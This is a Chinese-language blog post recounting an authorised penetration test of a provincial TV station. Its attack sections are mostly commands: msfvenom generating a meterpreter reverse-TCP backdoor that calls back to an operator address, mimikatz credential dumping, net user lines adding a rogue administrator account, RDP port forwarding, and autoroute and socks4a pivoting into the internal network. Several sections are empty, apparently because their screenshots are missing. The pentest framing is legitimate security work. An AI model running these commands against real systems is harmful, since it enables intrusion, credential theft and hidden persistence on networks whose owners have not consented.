目录
  1. 1. 00x01 信息
  2. 2. 00x02 Msf利用
  3. 3. 00x03 转变策略
  4. 4. 00x04 内网碰撞
年前的一次授权渗透测试

00x01 信息

目标:某省电视台
环境:外网
目标数量:2
当时请假了,于是没赶上,(阵容强大,内容可能会引起不适,请关闭页面)部门同事们也是No.1,秒shell了一个。


Jsp马儿,administrator权限
机器:

权限:

端口开放:

Emmmmmmm….
我也看到有445了…但打不动
进程:

内网开放3389,内网装有亚信

00x02 Msf利用

使用msfvenom生成后门,其中x.x.x.x为防火墙的出口地址。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=x.x.x.x lport=9999 -f exe > x64reservershell.exe
。。。。。。。。。
抓取密码,在meterpreter中,可以使用load mimikatz加载猕猴桃,但此次没有抓到密码,百度一顿原来mimikatz抓不到windows2012的密码。
meterpreter>load mimikatz
meterpreter>wdigest
……啥也没抓到
由于目标机器没有杀软,直接添加用户并加入administrators组
meterpreter>shell
c:\windows\temp1>net user username password /add
c:\windows\temp1>net user localgroup administrators username /add
c:\windows\temp1>exit
meterpreter>
将远程桌面端口转发至本地,供其他小伙伴进内网
meterpreter>portfwd add -l 6666 -p 3389 -r 127.0.0.1 #-l为本地端口;-p为目标服务器端口;-r为目标服务器,这里写的是127.0.0.1,即为将受控服务器的远程桌面端口转发到kali的6666端口
meterpreter>portfwd add -l 9999 -p 8000 -r 192.168.2.4 #将192.168.2.4的8000端口转发到本地的9999端口

可以使用run autoroute添加路由,或者使用socks4a代理,之后可以内网漫游。
run autoroute –h #查看帮助run autoroute -s 192.168.159.0/24 #添加到目标环境网络
run autoroute –p #查看添加的路由

msf> use auxiliary/server/socks4a
msf > set srvhost 127.0.0.1
msf > set srvport 1080
msf > run

00x03 转变策略

进服务器后,对当前c段,进行分析
查到mq apache控制台


00x04 内网碰撞



文章作者: laolisafe
文章链接: https://laolisafe.com/a/58878.html
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 大老李的Blog
打赏
  • 微信
  • 支付宝

评论